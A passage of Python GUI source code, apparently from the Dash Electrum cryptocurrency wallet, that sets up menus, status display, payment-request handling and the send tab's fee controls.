try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.dip3_tab)
add_toggle_action(view_menu, self.console_tab)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Masternodes"), self.show_masternode_dialog)
tools_menu = menubar.addMenu(_("&Tools"))
# 'Settings' and 'Preferences' are reserved menu titles on macOS, so a different label is used there as a workaround
tools_menu.addAction(_("Dash Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.dash.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("https://docs.dash.org/en/latest/wallets/index.html#dash-electrum-wallet")).setShortcut(QKeySequence.HelpContents)
self._auto_crash_reports = QAction(_("&Automated Crash Reports"), self, checkable=True)
self._auto_crash_reports.setChecked(self.config.get(BaseCrashReporter.config_key, default=False))
self._auto_crash_reports.triggered.connect(self.auto_crash_reports)
help_menu.addAction(self._auto_crash_reports)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def auto_crash_reports(self, state):
self.config.set_key(BaseCrashReporter.config_key, state)
self.setup_exception_hook()
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('dash:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Dash Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Dash.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Dash system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Dash Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Dash Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
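# Drains the queue filled by on_network('new_transaction', ...); runs at most
# once every 20 seconds, and collapses three or more queued transactions into
# a single summary notification.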
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Dash Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Dash Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in duffs/kB
return format_fee_satoshis(fee_rate, num_zeros=self.num_zeros) + ' duffs/kB'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
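# Keeps a coin amount edit and its fiat counterpart in sync: editing either
# field recomputes the other from the current self.fx exchange rate, blanking
# the counterpart when no rate or amount is available.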
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
self.masternode_manager.send_subscriptions()
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_proposals_tab()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
l.setObjectName("history_container")
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Dash address where the payment should be received. Note that each payment request uses a different Dash address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Dash addresses.'),
_('The Dash address never expires and will always be part of this Dash Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.setObjectName("receive_container")
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} duffs are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Dash address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Dash address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(self.amount_e.width())
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Dash transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
self.extra_payload = ExtraPayloadWidget(self)
self.extra_payload.hide()
msg = _('Extra payload.') + '\n\n'\
+ _('Dash DIP2 Special Transactions extra payload.')
self.extra_payload_label = HelpLabel(_('Extra payload'), msg)
self.extra_payload_label.hide()
grid.addWidget(self.extra_payload_label, 7, 0)
grid.addWidget(self.extra_payload, 7, 1, 1, -1)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
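# fee_cb above is the FeeSlider callback: in dynamic mode it stores the slider
# position ('fee_level' or 'depth_level'), in static mode an absolute
# 'fee_per_kb' rate; in both cases it refreshes feerate_e and recomputes the
# fee (or re-runs spend_max when the Max button is checked).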
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
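# on_fee_or_feerate keeps fee_e and feerate_e mutually exclusive: editing one
# clears the "modified" flag on the other so only a single value stays frozen,
# blanking the edited field returns to automatic fee calculation, and any
# manual edit deactivates the fee slider.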
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_kb())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Dash Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 duffs might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
